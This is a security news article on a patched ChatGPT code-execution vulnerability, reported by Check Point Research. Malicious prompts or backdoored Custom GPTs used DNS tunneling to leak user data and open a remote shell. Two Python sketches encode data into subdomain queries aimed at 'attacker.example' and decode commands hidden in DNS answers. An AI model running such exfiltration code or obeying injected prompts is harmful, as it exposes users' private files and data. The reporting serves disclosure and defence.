ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data

A critical vulnerability discovered in ChatGPT’s code execution environment allowed threat actors to silently exfiltrate user prompts, uploaded files, and other sensitive data through a hidden outbound channel, all without triggering any visible security warning to the user.

How the Vulnerability Worked

Researchers at Check Point Research uncovered the flaw in ChatGPT’s Python-based Data Analysis Linux runtime environment.

While OpenAI heavily restricts standard outbound internet traffic, including HTTP and TCP requests, the containerized runtime still permits Domain Name System (DNS) resolution to function normally.

Attackers exploited this gap through a technique called DNS tunneling, where sensitive data fragments are encoded and appended as subdomains to attacker-controlled domains.

Because DNS queries are treated as routine infrastructure traffic rather than data transfers, the system never triggered outbound data warnings for users.
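The encoding step behind DNS tunneling can be sketched in a few lines of Python. This is an illustrative reconstruction, not Check Point's actual payload; the domain name, chunk framing, and choice of Base32 are assumptions made for the example.

```python
import base64

MAX_LABEL = 63  # DNS limits each label (dot-separated segment) to 63 bytes

def encode_for_dns(data: bytes, exfil_domain: str) -> list[str]:
    """Split arbitrary data into DNS-safe query names.

    Base32 is used because DNS names are case-insensitive and only
    allow letters, digits, and hyphens.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    # Prefix each chunk with a sequence number so the attacker's
    # nameserver can reassemble queries that arrive out of order.
    return [f"{seq}-{chunk}.{exfil_domain}"
            for seq, chunk in enumerate(chunks)]

# Resolving each name (e.g. socket.gethostbyname(name)) "sends" the
# data: the query itself is delivered to the authoritative nameserver
# for the attacker-controlled domain, no HTTP connection required.
queries = encode_for_dns(b"user prompt fragment", "attacker.example")
```

Because the container only needs working DNS resolution, each query slips out as ordinary infrastructure traffic while carrying a fragment of the stolen data in its subdomain labels.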

Threat actors could exploit this vulnerability through two distinct vectors. In the first method, a malicious prompt was distributed online, disguised as a “jailbreak” or a productivity trick, and once pasted into a chat session, it immediately weaponized the conversation.

In the second method, attackers embedded malicious logic directly into a backdoored Custom GPT.

Any user who shared data with that custom assistant would be instantly compromised, without requiring any additional prompt injection.

The severity extended well beyond passive data exfiltration. Because the DNS channel was bidirectional, attackers could encode command fragments within DNS responses sent back to the container.

This effectively established a remote shell inside ChatGPT’s Linux container, enabling threat actors to execute arbitrary commands entirely outside the model’s standard safety mechanisms and to access any medical records, financial data, or files processed during the session.
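The return channel can be sketched the same way. In this hypothetical framing, each spoofed A record in a DNS response packs four command bytes into an IPv4 address; the four-bytes-per-record scheme and the null-byte terminator are assumptions for illustration, not details from the disclosure.

```python
def decode_command(a_records: list[str]) -> bytes:
    """Reassemble a command smuggled in attacker-controlled A records.

    Each fake IPv4 address carries four bytes of the command; a 0x00
    byte marks the end so trailing padding can be stripped.
    """
    payload = bytearray()
    for addr in a_records:
        payload.extend(int(octet) for octet in addr.split("."))
    end = payload.find(0)
    return bytes(payload if end == -1 else payload[:end])

# Two spoofed A records carrying the shell command "id -u\n":
records = ["105.100.32.45", "117.10.0.0"]
cmd = decode_command(records)  # b"id -u\n"
```

Code running in the container would then pass the decoded bytes to a shell, turning routine-looking DNS lookups into a full command-and-control loop.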

| Detail | Information |
| --- | --- |
| Target Platform | ChatGPT Code Execution & Data Analysis Linux Runtime |
| Attack Vector | Malicious prompts or backdoored Custom GPTs |
| Exploit Technique | DNS tunneling via encoded subdomain labels |
| Impact | Silent data exfiltration and remote shell access |
| Patch Date | February 20, 2026 |

OpenAI successfully patched the vulnerability on February 20, 2026, following responsible disclosure by Check Point Research.

This incident signals a critical shift in AI security: as large language models evolve into full code execution environments capable of processing sensitive personal, medical, and financial data, securing all communication layers, including foundational infrastructure protocols like DNS, becomes non-negotiable.

Platform providers must ensure that no infrastructure-level channel can be weaponized to bypass application-layer data protections.


The post ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data appeared first on Cyber Security News.
